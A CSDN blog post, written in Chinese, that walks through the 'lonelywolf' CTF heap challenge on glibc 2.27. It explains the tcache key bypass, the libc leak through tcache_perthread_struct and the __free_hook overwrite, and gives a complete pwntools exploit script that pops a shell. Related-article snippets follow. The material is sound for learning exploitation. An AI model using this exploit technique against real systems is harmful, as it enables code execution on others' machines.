2.27 tcache破坏key 打tcache dup 例题--lonelywolf

最新推荐文章于 2024-08-09 21:25:57 发布
最新推荐文章于 2024-08-09 21:25:57 发布
阅读量253 收藏 3
点赞数 4
文章标签: 数据库 前端 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74220442/article/details/137968436
版权

保护全开经典堆题 也是菜单的形式 我们静态分析看看

可以看到add函数 限制了chunk块的大小在0x78以下

edit函数

这里有个off by null但好像没用道、

show

打印地址

delete

没有置为0 存在uaf 漏洞

基本思路就是:通过泄露libc地址,通过double free 挂 free_hook 然后改为system

这里难点在于libc地址如何泄露,由于0x78 是被挂入fastbin而不是 unsortged bin 因此通过unsorted bin 来泄露地址是不可以的,因此我们这里要利用tcache的性质来打

我们知道tcache有一个tcache_pthread_stuct 的堆 也就是最开始位置的那个堆 那个的长度默认是0x250 我们可以通过泄露堆地址,用double free 把这个堆取出来 再free掉 就可以挂入unsorted bin当中 泄露地址了,因此还有个问题 堆地址如何来呢?通过tcache bin 中的double free addr<----addr fd就是addr 因此可以泄露堆地址,但由于是2.27版本后期 不难直接打double free 因为有一个key检验 那个key的值指向tcache_pthread_stuct下面0x10的位置,会检验这个key的值 如果一样就遍历一遍tcache bin 因此我们要破坏这个key 由于没有置0 直接edit 就可以了。这里还有个问题,就是tcache bin没满之前是不会挂入unsorted bin的因7此我们要 通过修改tcache的计数器counts 来把这个位置填为7 这里我也不知道为什么要挂在heap_base+0x10+0x20+p64(0x7000000)的位置 这点我不太明白

后泄露了libc地址之后 由于此时的tcache被释放进unsorted bin后在原本这些tcache counts对应的地方被写入了main_arena_96的地址,所以我们要先恢复tcache counts。然我们malloc一个0x80由于此时不属于fastbi n的范围因此进入tcache bin 因此就可以打tcache double free 但此时如果 malloc <0x80 就会被挂进fast bin fastbin打double free 比tcache 复杂 所以择取简单的打

#!/usr/bin/python3
import logging

from pwn import *
import random
import os
import sys
import time
from pwn import *
from ctypes import *
#--------------------setting context---------------------
context.clear(arch='amd64', os='linux', log_level='debug')
sla = lambda data, content: mx.sendlineafter(data,content)
sa = lambda data, content: mx.sendafter(data,content)
sl = lambda data: mx.sendline(data)
rl = lambda data: mx.recvuntil(data)
re = lambda data: mx.recv(data)
sa = lambda data, content: mx.sendafter(data,content)
inter = lambda: mx.interactive()
l64 = lambda:u64(mx.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
h64=lambda:u64(mx.recv(6).ljust(8,b'\x00'))
def dbg():
    gdb.attach(mx)
    pause()

#---------------------------------------------------------
# libc = ELF('/home/henry/Documents/glibc-all-in-one/libs/2.35-0ubuntu3_amd64/libc.so.6')
libc = ELF('./libc-2.27.so')
filename = "./lonelywolf"
mx = process(filename)
#io = remote("47.104.24.40",1337)
elf = ELF(filename)

#初始化完成---------------------------------------------------------
def add(size):
    sla("Your choice: ","1")
    sla("Index: ","0")
    sla("Size: ",str(size))

def edit(content):
    sla("Your choice: ","2")
    sla("Index: ","0")
    sla("Content: ",content)
def show():
    sla("Your choice: ","3")
    sla("Index: ","0")
def delete():
    sla("Your choice: ","4")
    sla("Index: ","0")
dbg()
add(0x28)
delete()
pause()
edit(p64(0)*2) #绕过double free检查
delete()
show()
rl("Content: ")
heap_base=h64()-0x260
log.success("heap_base"+hex(heap_base))

edit(p64(heap_base+0x10))
add(0x28)
add(0x28)

edit(p64(0)*4+p64(0x7000000))
pause()
delete()
show()
rl("Content: ")
libc_base=l64()-88-0x3ebc48
log.success(hex(libc_base))
libc.address=libc_base
free_hook=libc.symbols['__free_hook']
system=libc.symbols['system']
#---------------------

add(0x78)

delete()

edit(p64(free_hook))
pause()
add(0x78)
add(0x78)
edit(p64(system))
add(0x78)
edit(b"/bin/sh\x00")
delete()
inter()
慕雪岑
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
tcache的利用方法
qq_39869547的博客
10-27 1594
tcache_perthread_struct结构体是用来管理tcache链表: 这个结构体位于heap段的起始位置,且有size:0x251 typedef struct tcache_perthread_struct { char counts[TCACHE_MAX_BINS];//数组长度64,每个元素最大为0x7,仅占用一个字节(对应64个tcache链表) tcache_entr...
[BUUCTF]PWN——ciscn_2019_final_3(tcache dup
mcmuyanga的博客
03-10 1020
ciscn_2019_final_3 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,提示是堆题 64位ida载入 add() remove() 简单的思路:先合并堆块,合并后的堆块大于tcache的范围,然后free掉即可出现libc,接下来就是堆块重叠malloc一个堆块到libc空间,通过gift得到libc地址,接着tcache attack修改__free_hook拿到shell tcache 第一次接触tcache,根据ctfwiki上的知识点简单总结一
好好说话之Tcache Attack(2):tcache dup与tcache house of spirit
hollk’s blog
02-02 1871
这篇文章介绍了两种tcache的利用方法,tcache dup和tcache house of spirit,两种方法都是用how2heap中的例题作为讲解。由于tcache attack这部分的内容比较多,所以分开几篇文章去写。例题后补,写完例题后可能会进行重新排版,内容不会少的!!!
[off by null + tcache dup]lctf_easy_heap
huzai9527的博客
05-17 244
[off by null + tcache dup]lctf_easy_heap 1.ida 分析 malloc函数中输入content存在off by null 2.思路 通过off by null,造成chunk overlapping,泄漏Libc的地址 这里存在off by null 通过unstored bin就可以泄漏,但由于tcache的存在,需要注意 先申请10个chunk,释放3-9,填满tcache bin之后,再释放0,1,2编号的chunk进入unstored bin
Tcache漏洞
m0_52343643的博客
04-06 285
tcache 为每个线程创建一个缓存(cache),从而实现无锁的分配算法,有不错的性能提升。正式提供了该机制,并默认开启647):放入相应 bins 中的 chunk 都会在其用户数据中包含,指向同 bins 中的下一个 chunk。
Glibc 2.27关于Tcache的增强保护 .pdf
09-05
《Glibc 2.27 Tcache增强保护详解》 Glibc,作为Linux系统中最核心的C语言标准库,其安全性能对整个系统的稳定性至关重要。2.27版本的更新,特别是针对Tcache(线程缓存)分配机制的增强保护,是针对内存管理安全性...
TCache-开源
04-25
TCache,作为一款开源的高性能键/值存储组件,旨在为现有的分布式内存对象缓存系统如Memcached或Dynamo提供增强的功能,以提升动态Web应用程序的速度并减轻数据库的负载。这款工具的核心价值在于其能够有效地缓存...
【技术分享】glibc 2.27-2.32版本下Tcache Struct的溢出利用 .pdf
09-05
【技术分享】glibc 2.27-2.32版本下的Tcache Struct溢出利用是一种高级的堆溢出漏洞利用技术,涉及到系统安全、漏洞挖掘和应急响应。在这些glibc版本中,引入了Tcache(Thread-Cache)机制以提高内存分配的效率,但...
glibc-2.27.tar.gz
07-22
在glibc 2.27中,你可以看到如何通过bin分配策略、fastbins、smallbins、unsorted bins、tcache(thread-local cache)等机制来优化内存分配的效率。通过对这些源码的阅读,开发者可以了解到如何更有效地管理内存,...
heap-viewer:一个IDA Pro插件,用于检查glibc堆,专注于漏洞利用开发
04-13
堆查看器 一个IDA Pro插件,...Tcache信息(glibc> = 2.26) GraphView的链表(bins / tcache) 结构视图(malloc_state / malloc_par / tcache_perthread) 魔术工具: 取消链接合并信息释放/合并信息假Fastbin查找器
tcache attacke
abelxu
12-31 517
以glibc2.27为例讲解tcache的各种漏洞利用方式 1.1数据结构 1.2 malloc和free的过程 2.tcache各种漏洞利用方式 2.1 tcache poisoning 通过覆盖 tcache 中的 next,不需要伪造任何 chunk 结构即可实现 malloc 到任何地址。 2.2 tcache dup 类似 fastbin dup,不过利用的是 tcache_put() 的不严谨 2.3 tcache perthread corruption 我们已经知道 tcache_perth
Tcache Attack(2)
yms0211的博客
09-16 957
tcache attack(2)
libc 2.27 堆管理机制
zhang14916的博客
10-06 1189
由于在libc2.26之后引入tcachebins,所以堆分配机制和之前不太相同 tcachebins——tcachebins是一个长度为64的字节数组,每个字节数组对应一条链表。所以tcachebins只能存放0x0-0x400大小的堆,且每个链表长度为7。并且类似于fastbins,是一个单链表。在释放大小为0x0-0x400大小的堆的时候,首先会被释放入对应长度tcachebins对应的链表中,当长度超出7后,再放入fastbin或unsortbins中。malloc的时候当发现malloc对应大小
glibc2.29堆溢出tcache的利用方式及原理
Hello World.c
03-06 8134
ibc2.29 堆溢出tcache的利用方式及原理 Dancing With Heap 与堆共舞 二进制学习之旅 参考资料: ctf-pwn https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/tcache_attack/#tcache-poisoning glibc wiki https://sourceware.org/glib...
Tcache Attack
qq_39153421的博客
04-21 665
tcache overview tcache机制在libc2.27之后新增,可以说它是类似于fastbin的机制,LIFO,但比fastbin的优先级更高,由名字可以看出它相当于一个缓存的作用。先看关于它的两个结构体 tcache_entry 和 tcache_perthread_struct(见glibc2.27源码): /* We overlay this structure on the user-data portion of a chunk when the chunk is stored
hgame week3——babytcache
40KO的博客
03-07 250
一道tcache的题目,完全不知道tcache是啥,结果看了一上午tcache的东西,大概是分配优先级比fastbin还高的fastbin吧。。主要区别是tcache的next直接指向了chunk的mem,fastbin的fd指向的是chunk的首地址,然后分配和归还内存的优先级最高。 思路 利用tcache poisoning和tcache dup两种利用方式来完成任意地址写,用来泄漏sys...
JDBC详细使用
最新发布
m0_73627305的博客
08-09 508
​ JDBC是一种标准,一种规则,主要作用是使用java语言操作数据库的​ JDBC这个标准中有很多的接口,接口中有很多方法。
SpringBoot依赖之Quartz Scheduler定时调度器使用MySQL存储Job
ahauedu的专栏
08-07 664
接上一篇。本篇将在 Spring Boot 项目中,使用 Quartz Scheduler 结合 MySQL 数据库来存储 Job。
seatunnel2.3.3在centos7上安装
鑫哥
08-09 863
安装前需要准备点环境,因为seatunnel是基于java开发的,因此需要先安装java,我这里使用的java1.8,可以网上搜索下java安装教程,记得配置JAVA_HOME环境变量。在安装的过程中需要用到mysql命令,因此也需要安装下MySQL环境,这里也不具体讲解了,在网上搜索安装就行。接下来就是正式安装seatunnel了,
tcache安全性分析
07-22
`tcache`是glibc中用于管理小块内存分配和释放的机制。它可以提高内存分配的性能,但也存在一些安全性问题。下面是对`tcache`的安全性进行分析: 1. Double Free(双重释放):`tcache`中的内存块被释放后,会直接存放在`tcache`链表中,而不会立即返回给操作系统。如果恶意代码释放同一个内存块两次,且这个内存块正好在`tcache`链表中,那么第二次释放会导致双重释放漏洞。攻击者可以利用该漏洞进行内存损坏、代码执行等攻击。 2. Use After Free(使用已释放的内存):如果程序在释放内存后继续使用该内存,就会发生 Use After Free 漏洞。由于`tcache`中的内存块没有被立即清零,因此攻击者可以通过重新分配相同大小的内存块来获取先前已释放的内存块,从而可能访问敏感数据或篡改程序的状态。 3. Heap Overflow(堆溢出):如果程序对`tcache`中的内存块进行操作时,超出了其分配的大小,就会导致堆溢出漏洞。攻击者可以通过溢出写入恶意数据,破坏相邻内存块的元数据或控制程序的执行流程。 4. Information Leak(信息泄漏):`tcache`链表中存储了先前已释放的内存块的地址。如果攻击者能够获取到这些地址,就可以通过分析这些信息来推断程序的内存布局或其他敏感信息。 为了减轻这些安全风险,建议在使用`tcache`时采取以下措施: - 避免双重释放:在释放内存后,及时将相关指针置为NULL,避免对已释放的内存进行第二次释放。 - 避免使用已释放的内存:在释放内存后,不要再对其进行任何操作,避免发生 Use After Free 漏洞。 - 对内存操作进行边界检查:确保不会发生堆溢出漏洞,即使攻击者通过重新分配相同大小的内存块获取到先前已释放的内存块。 - 清零敏感数据:在释放内存前,尽量将敏感数据清零,避免信息泄漏。 此外,及时更新glibc等库版本也可以提高`tcache`的安全性,因为库开发者通常会修复已知的安全漏洞和问题。 总之,虽然`tcache`可以提高内存管理的效率,但在使用过程中仍然需要注意安全性,并采取相应的措施来防止潜在的漏洞和攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值